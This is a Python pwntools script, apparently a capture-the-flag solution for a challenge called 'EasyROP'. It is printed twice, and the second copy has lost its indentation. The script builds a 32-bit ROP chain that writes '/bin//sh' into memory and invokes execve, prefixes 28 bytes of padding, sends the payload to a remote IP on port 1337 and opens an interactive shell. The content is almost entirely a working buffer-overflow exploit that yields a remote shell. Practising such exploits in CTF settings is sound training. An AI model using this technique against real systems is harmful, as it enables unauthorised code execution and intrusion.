aagallag/easyrop_solution.py

## easyrop_solution.py
#!/usr/bin/env python2
# execve generated by ROPgadget

from pwn import *

def getropchain():
    # Padding goes here
    p = ''

    p += p32(0x0806fa7a) # pop edx ; ret
    p += p32(0x080eb060) # @ .data
    p += p32(0x080b90e6) # pop eax ; ret
    p += '/bin'
    p += p32(0x0805564b) # mov dword ptr [edx], eax ; ret
    p += p32(0x0806fa7a) # pop edx ; ret
    p += p32(0x080eb064) # @ .data + 4
    p += p32(0x080b90e6) # pop eax ; ret
    p += '//sh'
    p += p32(0x0805564b) # mov dword ptr [edx], eax ; ret
    p += p32(0x0806fa7a) # pop edx ; ret
    p += p32(0x080eb068) # @ .data + 8
    p += p32(0x080494a3) # xor eax, eax ; ret
    p += p32(0x0805564b) # mov dword ptr [edx], eax ; ret
    p += p32(0x080481d1) # pop ebx ; ret
    p += p32(0x080eb060) # @ .data
    p += p32(0x0806faa1) # pop ecx ; pop ebx ; ret
    p += p32(0x080eb068) # @ .data + 8
    p += p32(0x080eb060) # padding without overwrite ebx
    p += p32(0x0806fa7a) # pop edx ; ret
    p += p32(0x080eb068) # @ .data + 8
    p += p32(0x080494a3) # xor eax, eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0807b06f) # inc eax ; ret
    p += p32(0x0806d685) # int 0x80

    return p

def getpayload():
    payload = ''
    payload += 'A'*28
    payload += getropchain()
    return payload

#p = process(['./EasyROP'])
p = remote('129.146.137.81', '1337')
p.sendline(getpayload())
p.interactive()
	#!/usr/bin/env python2
	# execve generated by ROPgadget

	from pwn import *

	def getropchain():
	# Padding goes here
	p = ''

	p += p32(0x0806fa7a) # pop edx ; ret
	p += p32(0x080eb060) # @ .data
	p += p32(0x080b90e6) # pop eax ; ret
	p += '/bin'
	p += p32(0x0805564b) # mov dword ptr [edx], eax ; ret
	p += p32(0x0806fa7a) # pop edx ; ret
	p += p32(0x080eb064) # @ .data + 4
	p += p32(0x080b90e6) # pop eax ; ret
	p += '//sh'
	p += p32(0x0805564b) # mov dword ptr [edx], eax ; ret
	p += p32(0x0806fa7a) # pop edx ; ret
	p += p32(0x080eb068) # @ .data + 8
	p += p32(0x080494a3) # xor eax, eax ; ret
	p += p32(0x0805564b) # mov dword ptr [edx], eax ; ret
	p += p32(0x080481d1) # pop ebx ; ret
	p += p32(0x080eb060) # @ .data
	p += p32(0x0806faa1) # pop ecx ; pop ebx ; ret
	p += p32(0x080eb068) # @ .data + 8
	p += p32(0x080eb060) # padding without overwrite ebx
	p += p32(0x0806fa7a) # pop edx ; ret
	p += p32(0x080eb068) # @ .data + 8
	p += p32(0x080494a3) # xor eax, eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0807b06f) # inc eax ; ret
	p += p32(0x0806d685) # int 0x80

	return p

	def getpayload():
	payload = ''
	payload += 'A'*28
	payload += getropchain()
	return payload

	#p = process(['./EasyROP'])
	p = remote('129.146.137.81', '1337')
	p.sendline(getpayload())
	p.interactive()